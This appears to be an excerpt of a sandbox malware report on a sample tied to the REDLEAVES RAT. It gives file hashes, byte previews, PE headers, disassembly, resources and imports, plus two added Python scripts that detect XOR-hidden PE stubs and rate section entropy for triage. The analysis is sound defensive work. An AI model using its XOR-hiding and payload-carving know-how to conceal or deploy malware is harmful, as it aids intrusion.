    Preview:0891@VR68D748062..D.........N........HML.....^.{(....+....m..m..e.....o..-...n.E....f..\'.O.c..Q..A;..R./...\~oK".n.itxZ"].n..A?..}..P.A.......^.q.szibZsWryisWtz.OL..^...z.^.}..}.V.N.....N..^..^.V..V..^......N..N.^.#.oD.V.V..N......o..V....V...N.a.5.wwn..^.K.N.^....V.J.N.I.N.V._...N....N.^....^.V.V....N.0N.N.{0.^..........^..........R...n.z.^....^..^......V.V.N.!.o$.^.^..V......o..^....^...V.N..O..^....^.V....V.N.N..^.0^.^...............N..........................................[...(.......}...+.....[...(..*....}............7......../............(..#.....?..........................3.................c........^......g.................^.^.......(..........................#.........s......+...Kq..N..................c...........c.......c...c.......f...c....+.../H..c....+......c...........c.......c...c.......f.........c.........c...........c.......c...c.......f.........c...c....+...........
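The two YARA hits on handkerchief.dat point at the same thing from different angles: the USG rule names it the obfuscated .dat carrying shellcode and the core REDLEAVES RAT, and SUSP_XORed_MSDOS_Stub_Message fires because a DOS-stub string is present under a single-byte XOR, which is the check YARA's xor string modifier performs. The script below is an added example, not part of the report or of either rule set. It reproduces that check, reports the offset and key of every stub string it finds, and then tests whether the same key decodes a whole PE: an MZ header shortly before the stub whose e_lfanew lands on a PE signature. If that test fails, the key only covers the stub string and the real decoding is whatever StarBurn.dll implements. The test blob is constructed; its 16-byte plaintext prefix mimics the "0891@VR68D748062" start of the file preview and is not a claim about the file's real layout or key.

```python
import struct
import sys

# The two DOS-stub strings PE linkers write: the MSVC/link.exe one (visible in the
# previews of cANdLlHS4N.exe and StarBurn.dll) and the Delphi one (obedience.exe, "MZP").
STUB_MESSAGES = (
    b"This program cannot be run in DOS mode",
    b"This program must be run under Win32",
)


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def find_xored_stub(blob, messages=STUB_MESSAGES, keys=range(1, 256)):
    """Emulate YARA's single-byte xor string modifier: return (offset, key, message)
    for every stub string found under any key in `keys`. Key 0x00 (plaintext) is
    left out by default because every ordinary PE file would match it."""
    hits = []
    for msg in messages:
        for key in keys:
            needle = xor_bytes(msg, key)
            start = 0
            while (idx := blob.find(needle, start)) >= 0:
                hits.append((idx, key, msg))
                start = idx + 1
    return sorted(hits)


def recover_pe(blob, hit, window=0x80):
    """XOR the whole blob with the hit's key and check whether a plausible PE emerges:
    an "MZ" within `window` bytes before the stub whose e_lfanew points at a PE
    signature. Returns (mz_offset, decoded_bytes_from_mz) or None; None means the
    stub string alone was XORed and the rest of the file uses a different scheme."""
    offset, key, _ = hit
    decoded = xor_bytes(blob, key)
    for mz in range(max(0, offset - window), offset):
        if decoded[mz:mz + 2] != b"MZ" or mz + 0x40 > len(decoded):
            continue
        e_lfanew = struct.unpack_from("<I", decoded, mz + 0x3C)[0]
        pe = mz + e_lfanew
        if decoded[pe:pe + 4] == b"PE\0\0":
            return mz, decoded[mz:]
    return None


def build_fake_encoded_blob(key=0x5A):
    """Constructed test input, not the real handkerchief.dat: a 16-byte plaintext
    prefix followed by a minimal MZ/PE header skeleton XORed with `key`."""
    hdr = bytearray(0x100)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = struct.pack("<I", 0x80)                     # e_lfanew
    hdr[0x4E:0x4E + len(STUB_MESSAGES[0])] = STUB_MESSAGES[0]    # usual stub offset
    hdr[0x80:0x84] = b"PE\0\0"
    return b"0891@VR68D748062" + xor_bytes(bytes(hdr), key)


if __name__ == "__main__":
    # Usage: python xored_stub.py handkerchief.dat   (no argument runs the constructed blob)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fake_encoded_blob()
    for hit in find_xored_stub(blob):
        off, key, msg = hit
        rec = recover_pe(blob, hit)
        whole = "yes, MZ at 0x%x" % rec[0] if rec else "no"
        print(f"stub {msg!r} at 0x{off:x}, key 0x{key:02x}, whole-file PE under that key: {whole}")
```

Run against a real dropped file, a hit with "whole-file PE: no" is still useful: the offset tells you where the embedded PE sits, and carving from a recovered MZ with a key that does decode the header gives you an unpacked sample to hash and scan even when the outer container uses something else around it.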
    Process:C:\Users\user\Desktop\cANdLlHS4N.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):1616040
    Entropy (8bit):7.373866112987865
    Encrypted:false
    SSDEEP:49152:fFdy58d2Bqc8Y7IDbauSVGDzhGjThGDzhmj8L5NsmCY:fFs58d2Bqc8Y7IDbauSVGDzhGjThGDzo
    MD5:6A1C14D5F16A07BEF55943134FE618C0
    SHA1:1A46E961BFFC6BCC1ADAC9708393462024F0F6AD
    SHA-256:ABA4DF64717462C61801D737C9FA20A7FADA61539EAEF50954331D31F7306D27
    SHA-512:07A8D9899CE04C4248CEBDFC105A37F3D8A337FF8F498F23853EDD05AC054DD99F976B13B2348660099C9135CE16A0876F7CFDF87E4B7139E88C27F9C598CF9B
    Malicious:true
    Antivirus:
    • Antivirus: Metadefender, Detection: 8%, Browse
    • Antivirus: ReversingLabs, Detection: 9%
    Reputation:low
    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@.................................c,...........@.............................../...........................`..$............................P......................................................CODE....$........................... ..`DATA................................@...BSS......................................idata.../.......0..................@....tls.........@...........................rdata.......P......................@..P.reloc..$....`......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
    Process:C:\Users\user\AppData\Local\Temp\obedience.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Mar 10 05:21:32 2022, mtime=Thu Mar 10 05:21:44 2022, atime=Thu Mar 10 05:21:32 2022, length=1616040, window=hide
    Category:dropped
    Size (bytes):1118
    Entropy (8bit):5.008588795039891
    Encrypted:false
    SSDEEP:24:8mrk3tHwNeRhHgKGUsAwZfaBJ9YC7aB6m:8mrk3tIeRhTrOaBJ9GB6
    MD5:D47E7BF51A9E2A6A44377FBC009DDB8D
    SHA1:4EF66D3777808262BD963A9188EF9C5D4B298AD9
    SHA-256:C755D52F273156F5C8F2D133260A8332C71FB8252398834379588949A8F8AE2D
    SHA-512:0CBA99F6751C04383823984474BF8A23DBD094BEAFE60B9E89BBFE4309822EC65C8E2306EA8D916056826D9A3EDE8691F4444FD7183C7C8A2DA0F14D5FE8D266
    Malicious:false
    Reputation:low
    Preview:L..................F.... .......G4..k.I.G4......G4............................:..DG..Yr?.D..U..k0.&...&...........-....$..2...hy.G4......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..jT.2.....Y....................yN|.A.p.p.D.a.t.a...B.P.1.....>Q.;..Local.<.......N..jT.2.....Y........................L.o.c.a.l.....N.1.....jT.2..Temp..:.......N..jT.2.....Y.....................J..T.e.m.p.....h.2.....jT.2 .OBEDIE~1.EXE..L......jT.2jT.2.....S....................$Z..o.b.e.d.i.e.n.c.e...e.x.e.......^...............-.......]............'......C:\Users\user\AppData\Local\Temp\obedience.exe..*.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.o.b.e.d.i.e.n.c.e...e.x.e.".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.........|....I.J.H..K..:...`.......X.......971342...........!a..%.H.VZAj....%$.............!a..%.H.VZAj....%$........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5
    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.349238472441651
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:cANdLlHS4N.exe
    File size:3804160
    MD5:b3139b26a2dabb9b6e728884d8fa8b33
    SHA1:de5672c7940e4fad3c8145ce9e8a5fcb1da0fcee
    SHA256:5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481
    SHA512:f6b857fdb4b393e9e80893d081c46471cb75a92289d53a8d457fe889eee46b7212c5188032aa24400da6e8ba56168716aeb3e48c77758b4fbb74817ba4b13951
    SSDEEP:98304:drzo0aM7e5O92nAv/tyE6peB1IY8CEueiSH0h292bNcx:pzo0S4yRY8tueiSUh1bCx
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a...............x\......xL..............vA......vu.[....vt......vE......vB.....Rich....................PE..L...M..X...........
    Icon Hash:e4e4b2b2a4b4b4a4
    Entrypoint:0x50cf91
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0x58ACFA4D [Wed Feb 22 02:41:17 2017 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:1
    File Version Major:5
    File Version Minor:1
    Subsystem Version Major:5
    Subsystem Version Minor:1
    Import Hash:c20231bee688c91a492f8eb02fe15604
    Instruction
    call 00007F907CA3EEFEh
    jmp 00007F907CA34F0Eh
    mov edi, edi
    push ebp
    mov ebp, esp
    push ebx
    mov ebx, dword ptr [ebp+08h]
    cmp ebx, FFFFFFE0h
    jnbe 00007F907CA350F1h
    push esi
    push edi
    cmp dword ptr [00773A24h], 00000000h
    jne 00007F907CA3509Ah
    call 00007F907CA3E88Dh
    push 0000001Eh
    call 00007F907CA3E6D7h
    push 000000FFh
    call 00007F907CA34A3Fh
    pop ecx
    pop ecx
    test ebx, ebx
    je 00007F907CA35086h
    mov eax, ebx
    jmp 00007F907CA35085h
    xor eax, eax
    inc eax
    push eax
    push 00000000h
    push dword ptr [00773A24h]
    call dword ptr [0053626Ch]
    mov edi, eax
    test edi, edi
    jne 00007F907CA350A8h
    push 0000000Ch
    pop esi
    cmp dword ptr [007742E8h], eax
    je 00007F907CA3508Fh
    push ebx
    call 00007F907CA3E48Bh
    pop ecx
    test eax, eax
    jne 00007F907CA3502Bh
    jmp 00007F907CA35089h
    call 00007F907CA35B82h
    mov dword ptr [eax], esi
    call 00007F907CA35B7Bh
    mov dword ptr [eax], esi
    mov eax, edi
    pop edi
    pop esi
    jmp 00007F907CA35096h
    push ebx
    call 00007F907CA3E46Ah
    pop ecx
    call 00007F907CA35B67h
    mov dword ptr [eax], 0000000Ch
    xor eax, eax
    pop ebx
    pop ebp
    ret
    mov edi, edi
    push ebp
    mov ebp, esp
    mov eax, dword ptr [ebp+08h]
    push esi
    mov esi, ecx
    mov byte ptr [esi+0Ch], 00000000h
    test eax, eax
    jne 00007F907CA350E5h
    call 00007F907CA3C2C2h
    mov dword ptr [esi+08h], eax
    mov ecx, dword ptr [eax+6Ch]
    mov dword ptr [esi], ecx
    mov ecx, dword ptr [eax+68h]
    mov dword ptr [esi+04h], ecx
    mov ecx, dword ptr [esi]
    cmp ecx, dword ptr [00000000h]
    Programming Language:
    • [ C ] VS2008 SP1 build 30729
    • [ASM] VS2010 build 30319
    • [ C ] VS2010 build 30319
    • [C++] VS2010 build 30319
    • [RES] VS2010 build 30319
    • [IMP] VS2008 SP1 build 30729
    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x179b14 | 0x168 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x376000 | 0x9c28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x380000 | 0x1bb70 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x160b10 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x136000 | 0x9d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x134938 | 0x134a00 | False | 0.562648719117 | data | 6.53626347491 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x136000 | 0x47062 | 0x47200 | False | 0.270200598638 | data | 5.08185706308 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x17e000 | 0x1f7724 | 0x1f0200 | False | 0.373334258472 | data | 7.60576445986 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x376000 | 0x9c28 | 0x9e00 | False | 0.375247231013 | data | 5.1750982001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x380000 | 0x2aa6e | 0x2ac00 | False | 0.271872715643 | data | 5.04489445576 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
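The section table adds up: 0x400 bytes of headers plus the five raw sizes (0x134a00 + 0x47200 + 0x1f0200 + 0x9e00 + 0x2ac00) come to exactly 3804160 bytes, the reported file size, so nothing is appended after the last section. The outlier is .data, a read/write non-code section with entropy 7.61 against 5.0 to 5.2 for .rdata, .rsrc and .reloc, which is what an embedded compressed or encrypted payload looks like and is consistent with the "string decryption" and "writes to foreign memory regions" signatures. The script below is an added example, not part of the Joe Sandbox report, that performs that triage on any PE32 or PE32+ file: it walks the section table with struct alone, computes per-section Shannon entropy, and flags high-entropy data sections, sections that are both writable and executable, and overlay bytes past the last section. The 7.2 entropy threshold and the mini PE it builds for its self-test are assumptions.

```python
"""Walk a PE section table with struct alone, compute per-section Shannon
entropy and flag what a triage analyst looks for: high-entropy non-code
sections, W+X sections and overlay bytes past the last section.
Added example; the mini PE it builds for its self-test is constructed."""
import math
import random
import struct
from collections import Counter

SECTION_HEADER = "<8sIIIIIIHHI"            # IMAGE_SECTION_HEADER, 40 bytes
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image):
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections, = struct.unpack_from("<H", image, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", image, e_lfanew + 20)
    off = e_lfanew + 24 + opt_size                    # section table follows the optional header
    sections = []
    for _ in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = \
            struct.unpack_from(SECTION_HEADER, image, off)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr, "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize,
            "chars": chars,
            "entropy": round(shannon_entropy(image[rawptr:rawptr + rawsize]), 2),
        })
        off += struct.calcsize(SECTION_HEADER)
    return sections


def triage(image, sections, high_entropy=7.2):
    """Human-readable findings; the 7.2 threshold is a working assumption."""
    findings = []
    end_of_sections = max(s["rawptr"] + s["rawsize"] for s in sections)
    if len(image) > end_of_sections:
        findings.append(f"overlay: {len(image) - end_of_sections} bytes after the last section")
    for s in sections:
        executable = bool(s["chars"] & IMAGE_SCN_MEM_EXECUTE)
        if executable and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s['name']}: writable and executable")
        if not executable and s["entropy"] >= high_entropy:
            findings.append(f"{s['name']}: entropy {s['entropy']} in a non-code section "
                            "(packed or encrypted payload?)")
    return findings


def build_pe(sections, file_align=0x200, sect_align=0x1000, header_size=0x400):
    """Constructed PE32 from (name, bytes, characteristics) triples; headers padded to 0x400."""
    e_lfanew, opt_size = 0x80, 0xE0
    headers, body, vaddr, rawptr = b"", b"", sect_align, header_size
    for name, data, chars in sections:
        rawsize = -(-len(data) // file_align) * file_align
        headers += struct.pack(SECTION_HEADER, name, len(data), vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)
        body += data.ljust(rawsize, b"\0")
        vaddr += -(-len(data) // sect_align) * sect_align
        rawptr += rawsize
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    optional = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")      # PE32 magic, rest zeroed
    return (dos.ljust(e_lfanew, b"\0") + coff + optional + headers).ljust(header_size, b"\0") + body


_rng = random.Random(7)
DEMO_SECTIONS = [   # constructed: low-entropy code, plain strings, random "encrypted" data
    (b".text", b"\x90" * 1024 + bytes(range(64)) * 16,
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".rdata", b"This program cannot be run in DOS mode\0" * 12,
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".data", bytes(_rng.getrandbits(8) for _ in range(4096)),
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]
DEMO_IMAGE = build_pe(DEMO_SECTIONS)

if __name__ == "__main__":
    secs = parse_sections(DEMO_IMAGE)
    for s in secs:
        print(f"{s['name']:8} va=0x{s['vaddr']:x} raw=0x{s['rawsize']:x} entropy={s['entropy']}")
    print(triage(DEMO_IMAGE, secs))
```

Point `parse_sections` at the bytes of a real file and the same `triage` call reproduces the check made above by hand; a non-zero overlay on a sample like this one would mean the sandbox's section view misses appended data worth carving.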
Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x376f58 | 0x134 | data | Chinese | China
RT_CURSOR | 0x37708c | 0xb4 | data | Chinese | China
RT_CURSOR | 0x377140 | 0x134 | AmigaOS bitmap font | Chinese | China
RT_CURSOR | 0x377274 | 0x134 | data | Chinese | China
RT_CURSOR | 0x3773a8 | 0x134 | data | Chinese | China
RT_CURSOR | 0x3774dc | 0x134 | data | Chinese | China
RT_CURSOR | 0x377610 | 0x134 | data | Chinese | China
RT_CURSOR | 0x377744 | 0x134 | data | Chinese | China
RT_CURSOR | 0x377878 | 0x134 | data | Chinese | China
RT_CURSOR | 0x3779ac | 0x134 | data | Chinese | China
RT_CURSOR | 0x377ae0 | 0x134 | data | Chinese | China
RT_CURSOR | 0x377c14 | 0x134 | data | Chinese | China
RT_CURSOR | 0x377d48 | 0x134 | AmigaOS bitmap font | Chinese | China
RT_CURSOR | 0x377e7c | 0x134 | data | Chinese | China
RT_CURSOR | 0x377fb0 | 0x134 | data | Chinese | China
RT_CURSOR | 0x3780e4 | 0x134 | data | Chinese | China
RT_BITMAP | 0x378218 | 0xb8 | data | Chinese | China
RT_BITMAP | 0x3782d0 | 0x144 | data | Chinese | China
RT_ICON | 0x378414 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2290679807, next used block 8912767 | |
RT_ICON | 0x3786fc | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x378824 | 0xea8 | data | |
RT_ICON | 0x3796cc | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x379f74 | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x37a4dc | 0x25a8 | data | |
RT_ICON | 0x37ca84 | 0x10a8 | data | |
RT_ICON | 0x37db2c | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x37df94 | 0x2e8 | data | |
RT_ICON | 0x37e27c | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_MENU | 0x37e3a4 | 0x18c | data | Chinese | China
RT_DIALOG | 0x37e530 | 0xd6 | data | |
RT_DIALOG | 0x37e608 | 0xe2 | data | Chinese | China
RT_DIALOG | 0x37e6ec | 0x34 | data | Chinese | China
RT_STRING | 0x37e720 | 0x2e | data | |
RT_STRING | 0x37e750 | 0x30 | data | |
RT_STRING | 0x37e780 | 0x8e | data | |
RT_STRING | 0x37e810 | 0xc0 | data | |
RT_STRING | 0x37e8d0 | 0x136 | data | |
RT_STRING | 0x37ea08 | 0x3c | data | |
RT_STRING | 0x37ea44 | 0x60 | data | |
RT_STRING | 0x37eaa4 | 0x54 | data | |
RT_STRING | 0x37eaf8 | 0x3a | data | |
RT_STRING | 0x37eb34 | 0xa4 | data | |
RT_STRING | 0x37ebd8 | 0x3e | data | |
RT_STRING | 0x37ec18 | 0x4e | data | Chinese | China
RT_STRING | 0x37ec68 | 0x2c | data | Chinese | China
RT_STRING | 0x37ec94 | 0x84 | data | Chinese | China
RT_STRING | 0x37ed18 | 0x1c4 | data | Chinese | China
RT_STRING | 0x37eedc | 0x14e | data | Chinese | China
RT_STRING | 0x37f02c | 0x10e | data | Chinese | China
RT_STRING | 0x37f13c | 0x50 | data | Chinese | China
RT_STRING | 0x37f18c | 0x44 | data | Chinese | China
RT_STRING | 0x37f1d0 | 0x68 | data | Chinese | China
RT_STRING | 0x37f238 | 0x1b2 | data | Chinese | China
RT_STRING | 0x37f3ec | 0xf4 | data | Chinese | China
RT_STRING | 0x37f4e0 | 0x24 | data | Chinese | China
RT_STRING | 0x37f504 | 0x1a6 | data | Chinese | China
RT_ACCELERATOR | 0x37f6ac | 0x68 | data | |
RT_GROUP_CURSOR | 0x37f714 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | Chinese | China
RT_GROUP_CURSOR | 0x37f738 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f74c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f760 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f774 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f788 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f79c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f7b0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f7c4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f7d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f7ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f800 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f814 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f828 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_CURSOR | 0x37f83c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China
RT_GROUP_ICON | 0x37f850 | 0x76 | data | |
RT_GROUP_ICON | 0x37f8c8 | 0x22 | data | |
RT_VERSION | 0x37f8ec | 0xdc | data | |
RT_MANIFEST | 0x37f9c8 | 0x25f | ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
KERNEL32.dll | LCMapStringW, GetTimeZoneInformation, WriteConsoleW, CompareStringW, IsValidLocale, CreateFileW, SetEnvironmentVariableA, GetStringTypeW, IsValidCodePage, GetEnvironmentStringsW, QueryPerformanceCounter, FreeEnvironmentStringsW, GetLocaleInfoW, GetConsoleMode, GetConsoleCP, GetStdHandle, SetHandleCount, HeapCreate, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetFileType, SetStdHandle, GetSystemTimeAsFileTime, HeapSize, HeapQueryInformation, HeapReAlloc, VirtualQuery, GetSystemInfo, CreateThread, ExitThread, HeapAlloc, GetStartupInfoW, HeapSetInformation, GetCommandLineA, EncodePointer, DecodePointer, ExitProcess, RaiseException, RtlUnwind, HeapFree, FindResourceExW, SearchPathA, GetProfileIntA, InitializeCriticalSectionAndSpinCount, SetErrorMode, GetNumberFormatA, GetWindowsDirectoryA, GetFileSizeEx, LocalFileTimeToFileTime, GetFileAttributesExA, FileTimeToLocalFileTime, FileTimeToSystemTime, GetShortPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, MoveFileA, CreateFileA, lstrcmpiA, GetThreadLocale, GetStringTypeExA, DeleteFileA, GetCurrentDirectoryA, GetACP, GetOEMCP, GetCPInfo, GetModuleFileNameW, ReleaseActCtx, CreateActCtxW, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, GlobalFlags, CopyFileA, GlobalSize, FormatMessageA, LocalFree, lstrlenW, MulDiv, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, ReplaceFileA, SystemTimeToFileTime, GetFileAttributesA, GetUserDefaultLCID, GlobalFree, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, WaitForSingleObject, ResumeThread, SetThreadPriority, GetCurrentThread, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, GetModuleFileNameA, GetLocaleInfoA, InterlockedExchange, lstrcmpA, GlobalAlloc, GetModuleHandleW, FindResourceA, FreeResource, GetCurrentThreadId, GlobalFindAtomA, GlobalDeleteAtom, GetVersionExA, FreeLibrary, CompareStringA, LoadLibraryW, lstrcmpW, GlobalLock, GlobalUnlock, GetCurrentProcessId, GetProcAddress, GetModuleHandleA, LoadLibraryA, lstrlenA, GlobalGetAtomNameA, GlobalAddAtomA, ActivateActCtx, DeactivateActCtx, SetLastError, FindResourceW, LoadResource, LockResource, SizeofResource, InterlockedDecrement, InterlockedIncrement, CreateMutexA, GetLastError, WideCharToMultiByte, GetTempPathA, CreateProcessA, GetTickCount, VirtualAlloc, lstrcpyA, lstrcatA, MultiByteToWideChar, Sleep, CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, EnumSystemLocalesA, VirtualProtect, GetProcessHeap
USER32.dll | CharUpperA, KillTimer, SetTimer, UnionRect, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, LoadCursorW, SetLayeredWindowAttributes, EnumDisplayMonitors, LoadCursorA, GetSysColorBrush, MapVirtualKeyA, GetKeyNameTextA, SystemParametersInfoA, GetSystemMetrics, GetMenuItemInfoA, InflateRect, RealChildWindowFromPoint, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, GetMenuStringA, AppendMenuA, InsertMenuA, RemoveMenu, GetDC, ReleaseDC, SetWindowContextHelpId, MapDialogRect, CreateDialogIndirectParamA, GetNextDlgTabItem, EndDialog, ShowOwnedPopups, GetMessageA, TranslateMessage, GetCursorPos, ValidateRect, PostQuitMessage, MoveWindow, SetWindowTextA, IsDialogMessageA, CheckDlgButton, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapW, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, RegisterWindowMessageA, LoadIconA, SendDlgItemMessageA, IsChild, SetWindowsHookExA, CallNextHookEx, GetClassLongA, SetPropA, GetPropA, RemovePropA, GetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, DispatchMessageA, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, DestroyWindow, UnhookWindowsHookEx, CloseClipboard, GetMessagePos, GetMonitorInfoA, MapWindowPoints, ScrollWindow, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, MessageBoxA, CreateWindowExA, GetClassInfoExA, RegisterClassA, AdjustWindowRectEx, GetWindowRect, ScreenToClient, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, DefWindowProcA, CallWindowProcA, GetClassNameA, GetSysColor, UnpackDDElParam, ReuseDDElParam, LoadMenuA, DestroyMenu, WinHelpA, SetWindowPos, LoadImageA, DestroyIcon, SetFocus, 